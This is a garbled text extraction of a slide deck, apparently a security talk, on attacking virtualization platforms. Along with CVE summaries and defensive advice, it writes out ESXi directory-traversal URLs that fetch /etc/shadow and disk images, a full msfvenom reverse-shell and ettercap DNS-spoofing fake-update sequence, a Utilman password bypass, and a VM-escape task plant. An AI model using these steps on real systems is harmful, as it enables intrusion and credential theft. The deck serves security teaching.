View
1.648
Download
10
Embed Size (px)
Citation preview
# WHO AM I
Senior Security EngineerPenetration TestingIncident Response
DISCLAIMERSThis presentation do not encourage people to hack.
(For educational purpose only)
AND
Presentation do not cover all parts of virtualization Technology area.
(It is rearranged from my thesis research literature review)
TOPIC Virtualization and hypervisor Virtualization threats and issues Vulnerability Statistic of widely used Hypervisors Guest VM Attack Virtualization environment network Attack Hypervisor Attack Hypervisor management and API Attack Host Attack from VM Docker Breakout by shocker Use Virtualization as Attack Tools Security for Virtualization
Virtualization
VIRTUALIZATION
CloudgoogleiCloud
VIRTUALIZATION
CloudgoogleiCloud
VIRTUALIZATION
VIRTUALIZATION
vShpere ClientvCenter
XenCenter
Virt-manager
Hypervisor
HYPERVISOR
HYPERVISOR
VMVM
VM VMVMVMVMVM VM
HYPERVISOR
VMVM
VM VMVMVMVMVM VM
HYPERVISOR
VMwareworkstation
HYPERVISOR VS DOCKER**Application containers
Virtualization Threats
Vulnerability Statistic
CVE-DETAIL
cvedetails.com
107
118
5458 58
45
cvedetails.com
Bare-metal Hypervisor vulnerability
2008 2009 2010 2011 2012 2013 2014 2015
0 20 40 60 80 100 120 140 160 180 200
DoS
Gain Privileges
Overflow
Code Execution
Gain Information
Memory Corruption
Bypass something
Directory Traversal
XSS
Bare-metal Hypervisor vulnerability 2008 -2015
cvedetails.com
52%15%
12%
7%6.5%
4.5%2%
1%0.5%
IS VIRTUALIZATION THREAT DIFFERENCE FORM TRADITIONAL ENVIRONMENT ?
OS : Linux , Windows, Solaris
Application : Web , Web Service, Mail , FTP, DB
Hardware : CPU , Memory, Storage, NIC, Network
Traditional
Operating System
OS : Linux , Windows, Solaris
Application : Web , Web Service, Mail , FTP, DB
Hardware : CPU , Memory, Storage, NIC, Network
XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, Arp Poisoning
Operating System
Traditional
OS : Linux , Windows, Solaris
Application : Web , Web Service, Mail , FTP
Hypervisor components : Kennel , Lib, API, Network
Hardware : CPU , Memory, Storage, NIC, Network
Virtualization
OS : Linux , Windows, Solaris
Application : Web , Web Service, Mail , FTP, DB
Hypervisor components : Kennel , Lib, API, Network
Hardware : CPU , Memory, Storage, NIC, Network
XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, Arp Poisoning
Virtualization
AdditionalAttack Surface
GENERAL SECURITY ISSUE FOR VIRTUALIZATION Information Leakage.
Unauthorized Access Intentionally OR Unintentionally USERS OR Administrators
Data Remain In Storage Data Ownership. Data Migration when end of service. Multi tenancy
Share resource Use VM to commit fraud or Crime
Laws and regulations
VIRTUALIZATION TECHNICAL SECURITY ISSUE
GUEST VM ATTACK Traditional Attacks According To Services Guest VM attack other Guest VMs (Same network segment) Guest VM attack other Guest VMs on the same Hypervisor (VM hyper Jumping) Cross-VM Attack (Side Channel Attack) Guest Stealing Guest Copy
TRADITIONAL ATTACK
Hypervisor
Guest VM1 Guest VM2
VM ATTACKS OTHERS VM
Hypervisor
Guest VM1 Guest VM2
VM HYPER JUMPING
Hypervisor
Guest VM1 Guest VM2
CROSS-VM ATTACK (SIDE CHANNEL)
Hypervisor
Guest VM1 Guest VM2
Time orComputational Power
GUEST STEALING
https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk
Hypervisor
ManagementAPIfile
GUEST STEALING
https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk
Hypervisor
ManagementAPIfile
GUEST STEALING : VASTO
GUEST STEALING : VASTO
GUEST COPY (Authorized)- Passwords
- OS- Mail
- Cookies- Browser history- Sensitive Data- Databases- Configurations- Source codes- Software licenses- Many more...
GUEST COPY
Copy them
(Unauthorized)
IF ( VM ==win7 or XP)
IF ( VM ==2008 or 2012)
How about password ?
How about password ?Ans: Reset it !!!
IF ( VM ==2008 or 2012)
Insert CD to make tricky password reset via repair option
Copy cmd.exe to be Utilman.exeAnd reboot
Press Windows Key + U
Bravo !!!
ps :http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html
Or add another account as administrator and hashdump
And crack it by JTR
IF ( VM ==Unix) THEN singel_mode ();
Forensic tools to access dataVMDK
Forensic tools to access dataSnapshot
NETWORK ATTACK Traditional Attacks According To Services vSwitch Attack Sniffing Scanning Mitm
OPEN VSWITCH CVE-2012-3449 INSECURE DIRECTORY PERMISSIONS VULNERABILITY CITRIX XENSERVER VSWITCH CONTROLLER VERSION 6.0.2.
- vSwitch Attack
- SNIFF
LNot much sensitive in modern VM/Hypervisor
- SCAN
Directory Traversal Brute Force Attack
Auxiliary/Scanner/Vmware/Vmware_http_login Burp Suite Intruder
Response Splitting
MANAGEMENT API
CVE-2009-3733 : ESXi Server Directory Traversal Vulnerability
Vmware Esxi 3.5 Or Earlier Fail To Sufficiently Sanitize User-supplied Input Data Exploiting The Issue May Allow An Attacker To Obtain Sensitive Information
From The Host Operating System
Hypervisor
ManagementAPI
System file
CVE-2009-3733 : ESXi Server Directory Traversal Vulnerability
https://192.168.254.158:8333/sdk/../../../../../../etc/shadow
Hypervisor
ManagementAPI
System file
CVE-2009-3733 : ESXi Server Directory Traversal Vulnerability
CVE-2009-3733 : ESXi Server Directory Traversal Vulnerability
ESX root passwordCrack it with JTR !!!
BRUTE FORCE ATTACKBy Metasploit VMware Auxiliary Modules
BRUTE FORCE ATTACKBy Burp Suite Intruder
NO-CVE : HTTP RESPONSE SPLITTING
NO-CVE : HTTP RESPONSE SPLITTING
MANAGEMENT ENVIRONMENT ATTACK Hooking MiTM Fake Update
Vmware-vilurker Evilgrade
HOOKING
MITM
Hypervisor
Management SoftwareAttackerHypervisor
MITMWhich picture show we are under MiTM attack ???
MITM
We never know !!!!
MITMWhich picture show we are under MiTM attack ???
MITM
We never know again!!!!
MITM
MITM : vSphere Client
MITM : XenCenter
Admin
FAKE MANAGEMENT SOFTWARE UPDATE
Concept
Internet
softwareupdate.vmware.comESXi
Admin
FAKE MANAGEMENT SOFTWARE UPDATE
Concept
Internet
softwareupdate.vmware.comESXi
Admin
FAKE MANAGEMENT SOFTWARE UPDATE
Concept
Internet
softwareupdate.vmware.comESXi
APR SpoofingRougeDNS
Admin
FAKE MANAGEMENT SOFTWARE UPDATE
Concept
Internet
softwareupdate.vmware.comESXi
APR SpoofingRougeDNS
FAKE MANAGEMENT SOFTWARE UPDATEBy vmware_vilurker
Credit:Watcharaphon Wongaphai
FAKE MANAGEMENT SOFTWARE UPDATEBy vmware_vilurker
FAKE MANAGEMENT SOFTWARE UPDATEBy vmware_vilurker
FAKE MANAGEMENT SOFTWARE UPDATE
By Evilgrade
FAKE MANAGEMENT SOFTWARE UPDATE
By Evilgrade
create msfpayload > agent.exe (/usr/share/isr-evilgrade/agent/) create handler wait reverse connection add domain upgrade version into /etc/ettercap/etter.dns ettercap -tqm arp:remote /victim/ /dnsserver real/ -> p select dns_spoof run evilgrade
FAKE MANAGEMENT SOFTWARE UPDATE
By Evilgrade
root@localhost:~# msfvenom p wondows/meterpreter/reverse_tcp LHOST=10.10.10.74 LPORT=8080 f exe > /opt/agemt.exe
root@localhost:~# cp /agent.exe /usr/share/isr-evilgrade/agent/agent.exe
root@localhost:~# echo softwareupdate.vmware.comA 10.10.10.74" >> /usr/local/share/ettercap/etter.dns
root@localhost:~# sudo ettercap -tqm arp:remote // //press proot@localhost:~# dns_spoof
root@localhost:~# msfconsole
msf>use exploit multi/handler
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST 10.10.10.74
msf>set LPORT 8080
msf> exploit
root@localhost :~# evilgradeevilgrade >config vmware
evilgrade >start By Evilgrade
FAKE MANAGEMENT SOFTWARE UPDATEResult
FAKE MANAGEMENT SOFTWARE UPDATEResult
Admin
FAKE MANAGEMENT SOFTWARE UPDATE
Result
Internet
softwareupdate.vmware.comESXi
APR SpoofingRougeDNS
HYPERVISOR ATTACK Compromised Hypervisor (Hyper-jacking)
Take Full Control Running A Rogue Hypervisor On Top Of An Existing Hypervisor Install Hypervisor Root Kits
Denial Of Service (Hypervisor Is A Great Single Point Of Failure) HyperCall Hooking/Attack
- DENIAL OF SERVICE : PSOD
- HYPER CALL HOOKING ATTACK
XEN i386
Paravirtualization
EXAMPLE CVE-2013-4553 : XEN DOMCTL_GETMEMLIST HYPERCALL IN XEN 3.4.X THROUGH 4.3.X CVE-2012-3495 : XEN HYPERCALL PHYSDEV_GET_FREE_PIRQ
BUFFER OVERFLOW DENIAL OF SERVICE EXPLOIT CODE TO EXECUTE IN PRIVILEGE
- HYPER CALL HOOKING/ATTACK
CVE-2014-4947 AND 4948LOCAL USERS DENY SERVICE AND OBTAIN POTENTIALLY SENSITIVE INFORMATION
CVSS V2 Base Score: 10.0 (High) Citrix Xenserver 6.2 SP1 And Prior Versions A Local User On The Guest System can Trigger A Buffer Overflow In HVM
(Hardware Virtual MACHINE) Graphics Console Support
Exploit On The Guest System Can Cause Denial Of Service Conditions Obtain Potentially Sensitive Information
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resources
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resources
AAAAAAAAAAAAAAAAAAAA...AAAAA
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
ResourcesAAAAAAAAAAAAAAAAAAAA...AAAAA
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resources
AAAAAAAAAAAAAAAAx00x00x00
Hypervisor
HVM Graphic Console
Guest VM Guest VM Guest VM
Resourcesxxxx
CVE-2015-3456 : VENOM Virtualized Environment Neglected Operations Manipulation Discovered by Jason Geffner, Crowdstrike senior security researcher The bug (Buffer Overflow) is in QEMUs virtual floppy disk controller (FDC). This vulnerable fdc code is used in numerous virtualization platforms and appliances,
notably XEN, KVM, VIRTUALBOX, and the native QEMU client.
Attacker need to have administrative or root privileges in the guest operating system in order to exploit VENOM
The VENOM vulnerability has existed since 2004, when the virtual floppy disk controller was first added to the QEMU codebase.
http://www.rapid7.com/resources/videos/venom-vulnerability-explained.jsp
Exploit to make Buffer overflow within the FDC, break out of the VM
Exploit to make Buffer overflow within the FDC, break out of the VM
Can access other VMs within that hypervisor
Exploit to make Buffer overflow within the FDC, break out of the VM
Can access other VMs within that hypervisorCan jump other VMs in other hypervisor
Exploit to make Buffer overflow within the FDC, break out of the VM
Can access other VMs within that hypervisorCan jump other VMs in other hypervisor
Can access to the underlying bare metal systems hardware and use that to see other systems on the hypervisor's network
HOST ATTACKVM ESCAPE
ResourcesHypervisor
Host
VM
HOST ATTACK
- USING PATH TRAVERSAL VULNERABILITY IN VMWARE'S SHARED FOLDERS
- CVE-2008-0923
- INSUFFICENT INPUT VALIDATION
VM ESCAPE
0xc20x2e0xc20x2e 0x2e0x2e ..
../../../../../../boot.ini
VM ESCAPEmodify VMFtp's source code to replace all occurrences of '+' with '\xc2' in an input pathname
VM ESCAPE
OR
VM ESCAPE
Modify task schedule as new job to run metX.exe and put to back to /windows/tasks
Put create task to host
Generate meterpreter
VM ESCAPE
VM ESCAPE
Run handler and wait until time to run Task
And Compromised
CVE-2012-0217 Virtualization Software Vulnerable To Privilege Escalation Attacks On Intel 64bits CPU
Some 64-bit operating systems and virtualization software programs are vulnerable to local privilege escalation attacks when running on intel processors (cpus)
Implemented The SYSRET Instruction In Their X86-64 Extension Attackers could exploit the vulnerability to force intel cpus to return a general
protection fault in privileged mode
Windows 7 And Windows Server 2008 R2, The 64-bit Versions Of Freebsd And Netbsd, The Xen Virtualization Software, As Well As Red Hat Enterprise Linux And SUSE Linux Enterprise Server, Which Include The Xen Hypervisor By Default
Architecture Vulnerability.
Architecture Vulnerability.CVE-2012-0217 Virtualization Software Vulnerable To Privilege Escalation Attacks On Intel 64bits CPU
code
MALICIOUS SCRIPT IN HYPERVISOR
ROP Xen Hypervisor Utilizing Return-oriented Programming (ROP). It modifies the data in the hypervisor that controls whether a VM is privileged
or not and thus can escalate the privilege of an unprivileged domain (DomU)
ROP
ROP
ROP
ROP Make Buffer overflow
ROP
LUnfortunately, this technique need a lot of factor to make it possible in today Hypervisor
FUZZING
USE VIRTUALIZATION AS ATTACK TOOL- Host Stealing (P2v host cloning)
VMware vCenter Converter Standalone
10.200.1.10
Administrator
*************************
10.200.1.100
root
*************************
10.200.1.10010.200.1.10
- Compromised Host- Get root/admin password0
10.200.1.10
Administrator
*************************Victim
10.200.1.100
root
*************************
ESX, Vmwareworkstation onHacker Machine
10.200.1.10010.200.1.10
Wait until finish
Dont forget to Dump RAM, too!!!P2V dont copy current data in RAM from victim server
volatility
Meterpreter pmdump
Finish ....and Completely PWNHave more time to get- DB ConnectionStrings- Sever Configurations- Source code- Crack more password- Dig more sensitive files
But.. Noting easy in the real life
But.. Noting easy in the real life
DOCKER BREAKOUTBY DOCKER SHOCKER
https://github.com/gabrtv/shocker
DOCKER BREAKOUTBY DOCKER SHOCKER
DOCKER BREAKOUTBY DOCKER SHOCKER
DOCKER BREAKOUTBY DOCKER SHOCKER
Security for Virtualization
SECURITY FOR VIRTUALIZATION Contract , Law and regulation System Segmentation
VLAN /SDN Dedicate Management Network Dedicated Storage Networks Protect All Virtual System File (Snapshot , VHDD, Configuration)
Update Patches System Hardening Implement Security Monitoring And Detection Tools Security Assessment !!!! BCP / DRP
CONCLUSION Traditional Attack method can be use to attack Virtualization Technology Virtualization Technology has more attack surfaces Hypervisor is concerned as single point of failure Secure by design, Security Protection and hardening are important for
Virtualization Technology
Join to get security news update